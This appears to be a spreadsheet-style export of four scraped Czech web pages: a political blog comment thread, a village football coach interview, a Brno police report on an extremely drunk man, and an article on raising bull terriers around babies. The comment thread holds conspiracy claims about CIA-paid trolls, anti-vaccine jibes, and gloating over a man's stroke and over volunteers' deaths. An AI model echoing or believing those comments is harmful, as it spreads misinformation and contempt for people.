hodině měl nějakého hosta, který se do mainstreamu nedostával - i když se občas stávalo, že jsem s ním úplně nesouhlasil, tak i přesto to byla velká osobnost, která bude chybět. Čest jeho památce Průměrný počet slepic: 4.8 (67 hlasů) Log in to post comments Napsal uživatel Itkica dne So, 02. 11. 2024, 00:21 Památka zesnulých A už je po půlnoci a jsou Dušičky, tak láskyplné vzpomenutí na naše milované co už tu s námi bohužel nejsou... Průměrný počet slepic: 4.9 (67 hlasů) Log in to post comments Napsal uživatel iw23 dne So, 02. 11. 2024, 08:10 O kolaboranta míň Je to smutné, jak šiřitelé západnich hodnot to pojali jako lítý boj proti názorovým oponentům, a to na život a na smrt (doslova). A my přitom jenom chceme, aby se naše připomínky k věcem veřejným braly v potaz. Abychom se bavili i o věcech co se jim nelíbí. Oni taky mluví a hlavně dělají věci, které se nám nelíbí a k tomu zavádějí ve vládě velmi kontroverzní věci, aniž by se vedla nějaká veřejná diskuse. Nejhorší ale na tom je, že si myslí, že jsou na straně pravdy a lásky. Neuvěřitelné toto. Ale co čekat od lidí typu signatářů petice "S komunisty se nemluví". Teď už se s nimi zase mluví, už se i volí do funkcí a nemluví se pro změnu zase s dezolátama. Ta nenávist v těch lidech zůstává, jenom se přeorientovala na jinou skupinu. Tu nenávist tady ale někdo šíří, řídí a podporuje, a nejspíš to bude někdo ze zahraničí. A Putin to nebude. Je hodně pravděpodobné, že komentář pod nickem Martin Beer napsal nějaký západem placený troll. A už se zase obloukem dostáváme k CIA , která má podvratnou činnost v popisu práce (a rozhodně nepracuje pro blaho naší země). Zajišťuje totiž směřování všech zemí do područí USA a to jakýmikoliv prostředky včetně násilí. Říkám si ale, že když existují trollové placení, zlí a nenávistní, tak by klidně mohli existovat i trollové zadarmo, věcní a inteligentní. A protože jsme národ počítačových (a gaučových) bojovníků, tak si dovedu představit, že bychom dokázali ten první druh i přečíslit. Protože asi nikdy nebude naše země vypadat podle našich představ, dokud je tady necháme bez odporu takhle řádit..........Howgh Edit (v 9:30): tak jsem koukal na FB na diskuse pod příspěvky vládních i opozičních předsedů stran (+ Turek, Konečná a Rajchl) a musím konstatovat, že k přečíslení už došlo:-). A nejen vládní politici ale i ten Babiš dostává pořádnou čočku, přestože to bude mít na jeho výsledek ve volbách pramalý vliv. Dokonce i diskuse na Seznamzprávách a Novinkách už nejsou tak agresivní jak si pamatuji před cca 2 lety. Asi musím i já připustit, že se veřejné mínění pomalu začíná posouvat kýženým směrem a že je reálná šance, že hyeny typu Martin Beer už brzy budou minulostí Průměrný počet slepic: 4.8 (46 hlasů) Log in to post comments Napsal uživatel Starý Kocour dne So, 02. 11. 2024, 09:42 Ta nenávist je spíše snaha nějak si ulevit, zbavit se frustrace, upozornit na sebe. Beztrestně. Zbaběle. Výkřiky ze tmy. A protože diskuze jsou plné takových výkřiků, často nenajdu sílu je číst. Bezmezná svoboda vyjadřování vede k tomu, že asi přestanu číst současníky vůbec. Číst taková slova od lidi, kteří se na zebe snaží jen upozornit nemá smysl. Průměrný počet slepic: 4.8 (22 hlasů) Log in to post comments Napsal uživatel Itkica dne So, 02. 11. 2024, 11:02 In reply to Ta nenávist by Starý Kocour Starý Kocour Souhlasím s vámi. Je to pro mnohé takový ventil na přetlak ze všeho kolem. A také je to často stranický, údernický úkol. A také je to pomatenost z vymývání hlav a špatného vidění reality. Určitě všichni vnímáme jak je tady agrese ve více směrech podporována. Tak jako bohužel víceméně vše co může škodit, vyhrocovat a ještě více "rozdělovat". Vykřikovat tedy i hnusy tzv. anonymně, ale anonymně zase platí jen pro některé, ten stále častější dvoumetr. Některé sociopatické "výkřiky" jsou opravdu šokující. A je určitým druhem masochismu je číst. Také s tím mám velký problém. Jenže platí i to "poznej nepřítele"... Průměrný počet slepic: 4.8 (20 hlasů) Log in to post comments Napsal uživatel Mirekxy dne So, 02. 11. 2024, 10:12 Ta nenávist.... .....je pouze zamaskovaný strach co s těmi všemi dobrosery bude, až, nejen v naší kotlince, zvítězí zase normální rozum a oni najednou zjistí, že jsou k ničemu a o jejich moudra tady nikdo nestojí. To bude hóóódně velké mrzeníčko. A fronty na pracáku. Průměrný počet slepic: 4.3 (33 hlasů) Log in to post comments Napsal uživatel Mirekxy dne So, 02. 11. 2024, 10:57 Další pecka libtardům mezi oči: https://www.parlamentnilisty.cz/arena/monitor/A-jak-to-ovlivnilo-volby-Ustavni-soud-smetl-zalobu-na-SPD-764181 Průměrný počet slepic: 4.9 ( 21 hlas) Log in to post comments Napsal uživatel KIMJAN dne So, 02. 11. 2024, 11:23 Mrtvice pana Krause nás zrovna nezarmoutila... Průměrný počet slepic: 4.3 (26 hlasů) Log in to post comments Napsal uživatel Bob dne So, 02. 11. 2024, 12:18 farmaka prachy za propagaci pseudovakcíny neužije, gauner Průměrný počet slepic: 4.5 (24 hlasů) Log in to post comments Napsal uživatel Itkica dne So, 02. 11. 2024, 19:39 Kimjan Ale je trochu rozdíl být zarmoucen z úmrtí de facto neznámého člověka, nebo mu nenávistně přát smrt jen tak z plezíru. Či vykřikovat jiné agresivní obludnosti. Určitě ani tomuto pánovi bych nic takového nepřála... Průměrný počet slepic: 4.2 (5 hlasů) Log in to post comments Napsal uživatel KIMJAN dne So, 02. 11. 2024, 11:24 Jasný vzkaz „Rád bych vás hned varoval, že se nebude opakovat scénář s Minskými dohodami, žádné zmrazení fronty, aby si Zelenského režim mohl „lízat rány“. Stejně jako Ukrajina nevstoupí do NATO v té či oné podobě. (Stálý představitel Ruské federace při OSN Vasilij Něbenzja ). Průměrný počet slepic: 4.9 ( 31 hlas) Log in to post comments Napsal uživatel Bob dne So, 02. 11. 2024, 12:20 In reply to Jasný vzkaz by KIMJAN nemusí nikam ustupovat, ale může vystupovat z pozice síly Průměrný počet slepic: 4.9 (23 hlasů) Log in to post comments Napsal uživatel KIMJAN dne So, 02. 11. 2024, 13:41 Podívejme se na Rusy: oni si mohou dovolit dělat zmrzlinu ze smetany! A to jsou - na rozdíl od nás -pod sankcemi... Průměrný počet slepic: 4.8 (20 hlasů) Log in to post comments Napsal uživatel Bob dne So, 02. 11. 2024, 14:49 snad z margarínu, ale cena jak v centru Florencie Průměrný počet slepic: 4.7 (15 hlasů) Log in to post comments Napsal uživatel KIMJAN dne So, 02. 11. 2024, 13:55 Opatření na podporu českého HDP Prezident České republiky vyhověl 60 žádostem občanů země o vstup do ukrajinské armády. Informuje o tom Český rozhlas s odvoláním na tiskového mluvčího Petra Pavla. Lze očekávat zvýšení poptávky po truhlářských a kremačních službách. Vlastně i kovovýroba si přijde na své - mrtvoly z ciziny přes hranice pouze v kovových futrálech. Průměrný počet slepic: 4.6 (18 hlasů) Log in to post comments Napsal uživatel Bob dne So, 02. 11. 2024, 14:50 mají zaházet do země v jejich milované UA Průměrný počet slepic: 5 (14 hlasů) Log in to post comments Napsal uživatel Zauber dne So, 02. 11. 2024, 16:21 60 blbů si chce zastřílet. 60 blbů si myslí, že jede na výlet. Pe-Pa by jim měl při té příležitosti hned udělit řád Bílého vola. Pokud tímto řádem ještě nedisponuje, mělo by se to neodkladně napravit. Průměrný počet slepic: 4.9 (17 hlasů) Log in to post comments Napsal uživatel Střelec dne Ne, 03. 11. 2024, 18:50 In reply to Prý, by Zauber Pepa 107 pracuje na zvýšení průměrného IQ v ČR cestou přirozeného výběru. Blahoslavme Darwina! Průměrný počet slepic: 4 ( 1 hlas) Log in to post comments Napsal uživatel iw23 dne So, 02. 11. 2024, 14:21 Aspen annual conference Výroční konference Aspen sdružuje transatlantické vůdce, aby diskutovali o klíčovém politickém, ekonomickém a společenském vývoji na základě odborných studií poskytnutých našimi partnery ………….s nažíme se také o podporu širšího konsenzu mimo rámec jednoho volebního cyklu……….. a p řekonat vysokou polarizaci názorů a stát jednotně na podpoře západních hodnot……... s polupracujeme s renomovanými poradenskými a výzkumnými firmami, jako jsou Boston Consulting Group , Data Ethics Lab a PAQ Research na odborných zprávách………..Výroční konference Aspen je jednou z vlajkových lodí institutu, která se koná od jeho založení v Praze v roce 2012……. Celé promo zde: https://www-aspeninstitutece-org.translate.goog/program/annual-conference/?_x_tr_sl=en&amp;amp;_x_tr_tl=cs&amp;amp;_x_tr_hl=cs&amp;amp;_x_tr_pto=sc A ejhle, v roce 2020 se zúčastnil konference i Andrej Babiš , takže je hned jasnější, odkud se tehdy u něj vzala nutkavá potřeba očkov at všechny lidi včetně nemluvňat (kromě apelu z WHO ) http://web.archive.org/web/20201125101130/https://www.aspeninstitutece.org/people_tags/aspen-annual-conference/ Takže to funguje asi t ak, že Aspen Institute shromáždí všechny lidi kteří mají na Západě nějakou reálnou moc na jednom místě a tam ji mi manipulují pomocí odborn ých zpráv spřátelených think-tanků. Tak teď už asi vím co myslel Fiala tím, že čerpá jen z důvěryhodných zdrojů:-) Průměrný počet slepic: 4.3 (15 hlasů) Log in to post comments Napsal uživatel Bob dne So, 02. 11. 2024, 14:51 Log in to post comments Napsal uživatel Chuck dne So, 02. 11. 2024, 15:23 Log in to post comments Napsal uživatel Zauber dne So, 02. 11. 2024, 16:27 každý jednou zkape. A tak bych to chápal, i když nejsem Kapal. Průměrný počet slepic: 3.1 (17 hlasů) Log in to post comments Napsal uživatel Bob dne So, 02. 11. 2024, 17:58 už mi chyběla denní dávka poezie 👍😁 Průměrný počet slepic: 4 (9 hlasů) Autor: vidlak</t>
  </si>
  <si>
    <t>71</t>
  </si>
  <si>
    <t>139</t>
  </si>
  <si>
    <t>20241101_140_3244501466_eee990ea249d423a9114.html</t>
  </si>
  <si>
    <t>eee990ea249d423a9114</t>
  </si>
  <si>
    <t>Hraje Javornice nejlepší fotbal v historii? Asi ano, říká trenér Krunčík</t>
  </si>
  <si>
    <t>Hraje Javornice nejlepší fotbal v historii? Asi ano, říká trenér Krunčík AUTOR: Pavel Kumpošt RUBRIKA: Fotbal ZVEŘEJNĚNO: 1. listopad 2024 JAVORNICE – Jsme teprve v polovině sezony, ale už nyní můžeme říct, že fotbalisté Sokola Javornice hrají v krajské 1. B třídě nejlepší fotbal ve své historii. Naposledy před týdnem porazili lídra celé soutěže Lokomotivu Hradec Králové a připsali si již sedmou výhru v sezoně! S 24 body je Javornice třetí, ale na čelo tabulky ztrácí jediný bod! V rozhovoru pro on-line deník Sport Rychnovska prozradil hlavní trenér Tomáš KRUNČÍK (42), jak tým vítězství oslavil, zda míří o soutěž výše, o čem celý javornický fotbal je a co říká na útočníka Adama Krejčího, druhého nejlepšího střelce 1. B třídy. Jak celý podzim dopadne, uvidíme po neděli 3. listopadu, kdy javornická parta změří síly s béčkem Náchoda . TJ SOKOL JAVORNICE hraje letos již sedmou sezonu v krajské soutěži! Horní řada zleva: brankář Tadeáš Tobiška, Martin Hanyk, Daniel Suk, vedoucí mužstva Štěpán Purm, Josef Kovaříček , Jakub Kráčmer, Adam Krejčí, trenér Tomáš Krunčík, Stanislav Koutský, Jan Kráčmer a zdravotník Oldřich Motl. Dolní řada: Jiří Počtýnský, Lukáš Harbich, Martin Plíhal, Ondřej Nosek , oslavenec Jarda "Rákos" Krejčí, kapitán Pavel Kasper, Jakub Hovorka a předseda oddílu Jaroslav Krunčík. Na fotografii chybí brankář Stanislav Hynek , brankář Lukáš Kasper, Pavel Chlachula, Matěj Kráčmer, Josef Petr, Tomáš Plesl , Jakub Resl a Martin Šrefl. Foto - 2x Archív Sokol Javornice Porazili jste aktuálně nejlepší tým krajské 1. B třídy a už vám schází pouhý bod na čelo tabulky, míří Javornice o soutěž výš? „Úsměvná otázka hned na začátek. Byl bych špatný trenér, kdybych neřekl, že chceme soutěž vyhrát, to chce přece každý a zrovna my jsme tomu nyní celkem „blízko“. Ale jsem realista. Jednak vyhrát takhle vyrovnanou soutěž, to se musí potkat spousta věcí, aby to tak dopadlo, a pak také pro vyšší soutěž musí být vytvořené podmínky atd. atd. Já myslím, a snad mi to nikdo nebude mít za zlé, případně se omlouvám, že to, že se hraje v Javornici už delší dobu B. třída, je samo o sobě obrovským a neuvěřitelným úspěchem pro Javornici i celé blízké okolí, které nám fandí a podporuje, jak to jen jde. Musíme myslet také na to, že loni jsme byli opravdu jen kousek od pádu do okresní soutěže, a pokud někteří zapomněli, tak všem připomínám, co to udělalo s morálkou, s hlavami hráčů, a že to rozhodně nebylo lehké období, kterým jsme si prošli. Takže mysleme hlavou, držme se při zemi a snažme se vyhrát každý zápas. To je to, co nás žene, motivuje a co máme všichni sakra rádi! Vítězství nad takovým týmem zasloužilo určitě oslavu, byla? „Takovéhoto soupeře neporážíte každý den, takže oslava byla. Vzhledem k tomu, že to bylo zrovna v termín, kdy jsme měli naplánované zakončení podzimu v rámci všech kategorií javornického fotbalu, tak se to docela hodilo, a můžu prozradit, že jsme se i celkem odvázali (směje se). Samozřejmě ve vší slušnosti a počestnosti. Ostatně jako vždycky.“ HLAVNÍ trenér A týmu Javornice Tomáš Krunčík je šťastný, že může fotbal i přes všechny i méně příjemné nástrahy, které mu fotbalový život nachystal, dělat tam, kde je doma, tedy v Javornici JAVORNICI už v kraji znají Hrají vaši muži v současnosti nejlepší fotbal v historii javornické kopané? „Všechny naše historické zápisy jsme přepsali hlavně historickým postupem do B-třídy. V tom období nám bylo prakticky jedno, kdo k nám přijede. Vyhrávalo se u nás fakt blbě, nebo spíše jen opravdu výjimečně. Nás nikdo neznal, my jsme nikoho neznali, ale mohli jsme se vždy spolehnout na naše menší hřiště, na nesmírné odhodlání a nadšení a na momenty překvapení, kterých jsme měli na soupeře nachystaných docela dost. Od té doby se situace značně změnila, soupeři už měli tu čest nás poznat, stejně tak i my je. Hráčům přibyly roky, zároveň i zkušenosti, změnili se rodinné stavy, přišly nové priority. Těžko tedy srovnávat, každé období má něco. Čistě z hlediska výsledků asi v současnosti nejlepší fotbal hrajeme, i když mi to někdy nepřijde, což je ale možná tím, že člověk stále hledá ve hře chyby, a ty se snaží odstraňovat, a zároveň ty dobře provedené věci už bere tak nějak automaticky. Diváci někdy nejsou plně spokojeni, s tím, co předvádíme. Pokud ale chceme být úspěšní, tak se někdy musíme plně podřídit taktice prostě víc, než očekávají. A pak také doufat, že ty kroky v nasazení hráčů, v rozestavení nám vyjdou podle plánu. A když tohle všechno vychází, tak pak se z toho dá v uvozovkách usoudit, že hrajeme nejlepší fotbal v historii, ale spíše bude sedět rčení, že dosahujeme nyní nejlepších výsledků v historii javornické kopané, ať už se na ten fotbal koukat dá nebo nedá (směje se).“ ZÁPASY Sokola Javornice v sezoně 2024/25: Sokol Javornice - Nové Město nad Metují 3:2, Předměřice n. Labem 2:4, Sokol Provodov 0:3, Lokomotiva Meziměstí 2:2, České Meziříčí 3:2, Spartak Rychnov B 4:1, Teplice n. Metují 3:1, Olympia Hr. Králové 0:0, Malšova Lhota 2:2, Spartak Opočno 3:1, Sokol Dohalice 2:0, Lokomotiva Hr. Králové 3:0 Na kterých oporách stojí váš tým? „Než jmenovat ze slušnosti a pokory celý kádr, tak se radši uchýlím k obligátnímu - fotbal je týmový sport. Samozřejmě mohl bych jmenovat některé hráče, na kterých naše hra stojí víc, a jsou pro nás nepostradatelní a možná je bude mrzet, že jmenováni nebyli. Ale pořád musí myslet na to, že jsou součástí skládačky a ta je tak pevná, jak její nejslabší článek. Důležité je, že naše opory hrají pro tým, nedbají na své statistiky a dobře vědí, že jen díky tomu dosahujeme momentálně těchto skvělých výsledků. Tohle všechno jsou naše základy a na těch v Javornici dlouhodobě stavíme.“ ZÁPAS V RYCHNOVĚ zvládla Javornice na výbornou, v sedmém kole 1. B třídy porazila béčko Spartaku 4:1! Foto – 2x Archív Petr Reichl Adam KREJČÍ Co byste řekl na adresu Adama Krejčího, s 12 brankami druhého nejlepšího střelce B třídy? „Myslím, že prakticky budu opakovat jeho slova, když začnu tím, že těch branek mohlo být ještě víc. Je super, že se mu střelecky daří a pro nás je skvělé to, že branky střílí vesměs pravidelně, což je posun proti minulým sezónám. Samozřejmě, že na tom všem má lví podíl zbytek týmu a my můžeme být rádi, že hraje právě u nás. Hrát proti němu bych totiž nechtěl.“ NEJLEPŠÍ střelci Sokola Javornice 12x Adam Krejčí, 6x Josef Kovaříček , 3x Jiří Počtýnský, 2x Martin Hanyk, 1x Pavel Kasper, 1x Jakub Kráčmer, 1x Jakub Nosek Jste obec s více jak tisícovkou obyvatel, je za Javornici schopno stále nastoupit dostatek mužů? „Mužů určitě ano, hráčů už o něco méně. Je to do jisté míry tím, že dost šikovných hráčů z naší spádové oblasti zatím působí v jiných týmech a já doufám, že dříve či později zakotví zpátky u nás v Javornici. Třeba je k tomu nalákají i naše dosavadní výsledky, o dobré partě nemluvě. Zároveň v případě totální personální krize nám umí vypomoci B-tým, což je pro nás určitě také malé plus. Kluci sice hrají okresní prales a trénují zcela výjimečně, když ale potřebujeme pomoct, tak se vždy někdo obětuje a nám tak vytrhnou doslova trn z paty.“ VAŽME si trenérů a jejich času pro fotbal V Javornici se skvěle věnujete také mládeži. Co říci o ní? Jaké soutěže hrají? „Dění okolo mládeže nechám spíše na předsedovi oddílu, za mne k tomu jen pár slov. Kdo se nepohybuje ve fotbalovém prostředí, tak si ani zdaleka neumí představit, kolik času trenéři mládeže nebo obecně trenéři musí obětovat mimo čas tréninků a zápasů. Važte si toho! V mnoha případech to je na úkor rodin, vlastního volného času a vlastních koníčků a hlavně, jestli si někdo myslí, že to dělají za/pro peníze, tak je to blázen. Proto mne pak naprosto vytáčí, když si někteří rodiče pletou přihlášku na fotbal s levně placeným hlídáním.“ Jaroslav KRUNČÍK, starosta TJ Sokol Javornice „Do aktuální sezóny jsme v souklubí s Rokytnicí přihlásili do okresních soutěží celkem čtyři mládežnická družstva – mladší přípravku, starší přípravku, mladší a starší žáky.“ Chtěli byste vzpomenout na lidi, bez kterých by současný javornický fotbal nebyl tam, kde je? „Těžké jmenovat jednotlivce. Fotbal v Javornici, na vesnici, je specifický tím, že ho dělají nadšenci pro potěšení ostatních celá desetiletí, a hlavně je důležité, že se prozatím vždy našli jejich následníci, kteří v rozvoji javornické kopané pokračují. Jen díku tomu je prakticky každých 14 dní na vesnici nějaká zábava, příležitost se sejít, dát si pivo , pozdravit se s kamarády. Je to tedy práce velké skupiny nadšenců a tak je to správně.“ O HISTORII klubu s Jaroslavem Krunčíkem „Fotbal se hrál v Javornici už před válkou. Fotbalový oddíl jako takový byl ale založen až v roce 1971 a do okresní soutěže se mužstvo přihlásilo v následujícím roce. Zajímavostí je, že do začátku nám jedny dresy věnovala Slavia Praha . Javornice se od té doby více či méně úspěšně pohybovala v okresních soutěžích, a to až do fotbalového ročníku 2017/2018, kdy jsme suverénně opanovali OP II. třídy s bilancí 25-0-1 a zajistili si pro další sezónu účast v krajské 1. B třídě.“ PODĚKOVÁNÍ Co byste rád řekl závěrem? „Velice děkuji a vážím si příležitosti PODĚKOVAT všem lidem, kteří se o javornický fotbal starali, starají a starat budou. DĚKUJEME všem, kteří nám fandí za dlouhodobou podporu, všem sponzorům a podporovatelům, rodinám hráčů. Speciální PODĚKOVÁNÍ patří samozřejmě Obci Javornice, která nás svou podporou zastřešuje a pro fotbal toho dělá opravdu hodně, a také spřátelené Obci Liberk za dosavadní podporu javornického fotbalu. Děkovat by se dalo dlouze, ale za sebe nebo za celý tým doufám, že alespoň tím malým poděkování výše uvedeným jsou naše výsledky, které nám nyní dělají takovou radost!“ TABULKA 1. B třídy, muži - 2024/25: 1 TJ Lokomotiva Hradec Králové 11 8 1 2 41:11 25 2 MFK Nové Město nad Metují 12 7 3 2 31:15 24 3 TJ Sokol Javornice 12 7 3 2 27:18 24 4 TJ Slavoj Teplice nad Metují 12 6 3 3 25:12 21 5 TJ SLAVOJ Předměřice n. L. 12 4 6 2 20:16 18 6 TJ Lokomotiva Meziměstí 12 5 3 4 37:34 18 7 FK Náchod B 11 5 2 4 20:14 17 8 FC Olympia Hr. Králové 1901 12 5 2 5 21:17 17 9 TJ Sokol Dohalice 12 4 3 5 16:23 15 10 FC Spartak Rychnov n. K. B 12 3 4 5 28:37 13 11 FC České Meziříčí 12 3 3 6 20:29 12 12 TJ SOKOL Malšova Lhota 11 3 3 5 18:29 12 13 Sokol Provodov 11 1 3 7 16:28 6 14 TJ Spartak Opočno 12 1 1 10 13:50 4 Autor: Pavel Kumpošt Autor person Pavel Kumpošt Rubrika transition_slide Hlavní</t>
  </si>
  <si>
    <t>83</t>
  </si>
  <si>
    <t>20241101_141_3244511721_57318752ba45360c8f62.html</t>
  </si>
  <si>
    <t>57318752ba45360c8f62</t>
  </si>
  <si>
    <t>KURIOZITA: Strážníci v Brně nevěřícně sledovali displej, opilému muži v&amp;nbsp;Řečkovicích nestačilo rozpětí testeru na alkohol</t>
  </si>
  <si>
    <t>KURIOZITA: Strážníci v Brně nevěřícně sledovali displej, opilému muži v&amp;nbsp; Řečkovicích nestačilo rozpětí testeru na alkohol Jihomoravský Městská policie Policie Složky IZS Z domova Zdravotnictví Zprávy podle krajů ZZS KURIOZITA: Strážníci v Brně nevěřícně sledovali displej, opilému muži v Řečkovicích nestačilo rozpětí testeru na alkohol BRNO – Do situace, se kterou se při své práci ještě nikdy nesetkali, přivedl ve čtvrtek v poledne dva brněnské strážníky čtyřiapadesátiletý muž. Přijeli ho zkontrolovat do tramvajové smyčky v Řečkovicích po telefonátu řidičky dopravního podniku. S pomocí cestujícího prý muže odtáhla z blízkosti kolejí, u kterých ležel silně podroušený alkoholem . Měla ale obavy, aby se nevrátil zpátky k trati a neohrozil tak svůj život. Moment překvapení pro hlídku nastal, když stále ještě polehávajícího muže pobídla k podstoupení dechové zkoušky. Přístroj totiž po prvním pokusu ukázal, že příliš vysokou hodnotu ani nedokáže změřit. Technické maximum tohoto konkrétního zařízení se přitom pohybuje kolem šesti promile. Strážníci proto muži zavolali záchrannou službu a s drobným časovým odstupem nechali dotyčného znovu dýchnout do alkohol testeru. Zobrazil extrémní hodnotu 5,38 promile, která pro nenavyklého člověka může být i smrtelná. Zdravotníci si muže převzali do své péče a po ošetření ho odvezli do nemocnice. Navíc je podezřelý z porušení takzvaného tabákového zákona, protože se v tomto stavu zdržoval na nástupišti hromadné dopravy. Ve správním řízení mu hrozí pokuta do dvaceti tisíc korun. Zdroj: MP Brno Autor: Lukáš Jirka Autor person Lukáš Jirka Rubrika transition_slide Jihomoravský</t>
  </si>
  <si>
    <t>530</t>
  </si>
  <si>
    <t>419</t>
  </si>
  <si>
    <t>20241101_142_3244485691_75466d4b48fa7501f298.html</t>
  </si>
  <si>
    <t>75466d4b48fa7501f298</t>
  </si>
  <si>
    <t>Chovatelka psů Babeta Štruncová: Bulteriéři jsou super dětské chůvy</t>
  </si>
  <si>
    <t>Chovatelka psů Babeta Štruncová: Bulteriéři jsou super dětské chůvy Výcvik jako základ Bulík jako terapeutický pes Jak připravit psa na příchod dítěte Přivykejte psa už před porodem Nechte pejska očuchat si miminko Hlídačky kolébky Pes není plyšová hračka Bezpečnost na prvním místě VIDEO: Stafordširský bulteriér versus anglický bulteriér „Pořízení psa je velká zodpovědnost na mnoho let. A pořízení rodiny je závazek na celý život. V mém případě přišel jako první pes, moje milovaná bulteriérka Chelsea . Vypadala jako něco mezi malým prasátkem a šiškou houskového knedlíku. Přezdívka Knedlík ji ostatně provázela celý život,“ vzpomíná Babeta Štruncová, maminka a zároveň chovatelka anglických bulteriéru. Tehdy byla ještě bezdětná, ale v jejich rodině už děti byly. Předsudky okolí vůči bull plemeni na sebe prý nenechaly dlouho čekat. „Chels však byla obrovský pohodář. Byla klidná, mazlivá a měla ráda lidi. Doprovázela mě na přednášky na vysoké, pak do práce. Nebyl problém jít s ní na pivo , jet na návštěvu k přátelům nebo na dovolenou. Stěhovala se s námi i do Norska ,“ pokračuje Štruncová. Stafordširský bulteriér versus anglický bulteriér: | Video: Youtube Výcvik jako základ Babeta Štruncová však jedním dechem dodává, že soužití s bulteriérkou by takto bezproblémové být nemohlo, kdyby nedílnou součástí jejich společenského života nebyl správný výcvik fenky. „Hrozně mě překvapilo, že nás na několika klasických kynologických cvičištích odmítli. Bylo mi to líto. Nechápala jsem, proč by nemohl bulík cvičit mezi ovčáky,“ krčí rameny chovatelka. Zvířecí deník a chovatelství Na základě doporučení od dalších majitelů bull plemen se nakonec s fenkou přihlásila na individuální výcvik k trenérovi psů Adamovi Holeksovi, který se kynologii věnuje profesionálně přes 15 let. „Před první lekcí jsem byla nervózní více než to štěně, ale Adamova profesionalita a jeho přístup i trpělivost byly fantastické,“ chválí Štruncová pomoc od profesionála. Nahrává se anketa ... Bulík jako terapeutický pes Právě u psího trenéra se Babeta Štruncová prý inspirovala a začala lidem vyvracet mýtus, že svalnatý klabonosý pes podobný žralokovi je stejnou krvelačnou bestií. Její bulík naopak začal lidem pomáhat. „Pod Adamovým vedením jsme se postupem let s Chels propracovaly ke canisterapii a složení potřebných zkoušek. Poté chodila do mateřských školek a domova seniorů jako terapeutický pes. Někteří z klientů domova mají doteď na pokojích fotku s Chels ,“ usmívá se chovatelka. Zvířecí deník a chovatelství Po pěti letech Babeta Štruncová podle svých slov usoudila, že soužití s bulíkem je fajn. A že jejich tvrdohlavost je jí vlastně moc sympatická. „A tak k nám do rodiny přibyla druhá fenka s klabonosem - Stella. I ona prošla výcvikem u Adama. Okolí moc nechápalo, že si pořizujeme druhého psa. Všichni totiž spíš čekali, kdy založíme rodinu,“ vzpomíná chovatelka, která je dnes už i maminkou. Základem spokojeného soužití je výcvik psa: Jak připravit psa na příchod dítěte Věnovat přípravě psa na příchod miminka do rodiny zvýšenou pozornost? Nebo nechat věcem volný průchod? To jsou otázky, jež se honí hlavou asi každé nastávající mamince, která už má doma psa. Kateřina Michálková, která působí jako průvodce psů a jejich páníčků, poskytla několik užitečných rad: „Příchod dítěte dokáže být stresem pro všechny členy domácnosti. Proto je vhodné psa již během těhotenství postupně připravovat na to, že denní režim bude jiný,“ upozorňuje Kateřina Michálková. Zvířecí deník a chovatelství Psa je tak dobré postupně přivykat na to, že doma přibude postýlka a kočárek, nebude moci spát v posteli, nedostane tolik pozornosti, v dosud klidném bytě bude proudit více emocí a objeví se nové pachy. „Příchod z porodnice může být prvním kritickým bodem celého procesu. Zkuste psa seznámit s novorozencem hned venku, kdy miminko ve vajíčku vynesete z auta. Pes je ‚mimo domov ‘, má více pohybu a volnosti. Stres tak může doslova vyběhat. Zároveň je dítě ve vajičku bezpečně uloženo,“ vysvětluje odbornice. „Mně se osvědčuje jednoduše položit vajíčko na zem a nechat všemu klid a volnost. Neznám psa, který by šel sám od sebe zakousnout novorozence,“ dodává Michálková. close info Zdroj: se svolením Babety Štruncové zoom_in Pes určitě není povinný nechat si líbit všechno. Pokud dává najevo, že se mu něco nelíbí, je úkolem dospělého dopřát psovi klid a dítěti vysvětlit, jak k psovi přistupovat a neubližovat mu. Hlídačky kolébky Do rodiny Štruncových přišlo miminko, když bylo Chels šest let a Stellče něco přes dva roky. Společné soužití dvou psů a malého miminka bylo podle slov Babety Štruncové přímo protkané krásnými momenty. „Fenky se vedle malého Daníka střídaly. Ležely u něj, po návratu z procházky kontrolovaly kočárek a nespustily oči z žádné návštěvy, která brala syna do ruk,“ usmívá se chovatelka a maminka v jednom. Pes není plyšová hračka Rodina samozřejmě musela dávat pozor, aby fenky malého nezranily; ne zamýšleným útokem, ale spíš bulteriéří nemotorností. „Hlavně jak malý začínal lézt a pak chodit. Každá z fenek vážila plus mínus dvacet kilo a pohybovaly se volně po bytě. Bylo potřeba dávat pozor, aby syna třeba neporazily,“ podotýká Babeta Štruncová. Tato zásada platí nejen u bulteriéřího záchvatu radosti ( kdy se pes točí a proběhne byt rychlostí blesku ), ale obecně. play_fill Zvířecí deník a chovatelství „Miminko, batole nebo malé dítě váží méně než pes. Opravdu je potřeba si uvědomit rizika srážky, pádu, shození ze schodů a podobně,“ doporučuje milovnice bulteriérů. Chovatelka zároveň připomíná, že je velmi důležité dopřát všem členům „domácí smečky“ možnost nerušeného odpočinku. A znát alespoň základní psí signály. „Pes určitě není povinný nechat si všechno líbit. Pokud dává najevo, že se mu něco nelíbí, je úkolem dospělého dopřát psovi klid a dítěti úměrně jeho věku ukazovat, jak má ke zvířeti přistupovat a neubližovat mu,“ říká chovatelka. close info Zdroj: Shutterstock zoom_in Pejsek není plyšák. Dítěti je tak potřeba vysvětlit, že ho nesmí například tahat za chlupy či za ocas. Bezpečnost na prvním místě Podle Babety Štruncové jde vše udělat s respektem ke všem členům domácnosti. Bezpečnost by však vždy měla být na prvním místě. „U nás doma proto třeba syn nikdy nemohl tahat psy za uši či ocas, malovat po nich, narážet do nich odrážedlem či podobné činnosti, které známe z videí na sociálních sítích,“ zdůrazňuje zásady spokojeného soužití mladá maminka. Pokud si její syn se psy hrál, bylo to vždy v bezpečném prostoru a nikdy ne o samotě. „A když naopak chtěla zejména Chelsea s malým odpočívat, mohla. Lidský kontakt jí byl příjemný. Už od miminka měli spolu usínací rituál, kdy v kontaktu ‚kůže na chlupy‘ usínali s klidným dechem oba,“ vzpomíná Babeta Štruncová. Zvířecí deník a chovatelství Po smutném úmrtí první fenky se rodina rozhodla pro pořízení nového psího parťáka. Podle hesla „jednou bulík, vždycky bulík“ prý měli hned jasno, jaké rasy další fenka bude. V rodině Štruncových tak přibyla bílá bulteriéří holčička Odettka, které je dnes rok a půl „Každá z našich bulteriérek měla a má v Daníkově životě jinou roli. Chelsea byla psí chůva, jeho průvodkyně a bezedná dojídačka svačinek. Stella mu ukázala, že i pejsek nemusí mít vždy náladu a chuť si hrát. A s naší Odettkou vyrůstali společně. A aby nás nebylo málo, v nejbližší době si budeme k nám do smečky pořizovat dalšího bulíka,“ uzavírá s úsměvem Babeta Štruncová. tag Psí život Zvířecí deník a chovatelství včera 07:00 gallery 6 Zvířecí deník a chovatelství 20. 10. 2024 gallery 5 Zvířecí deník a chovatelství 18. 10. 2024 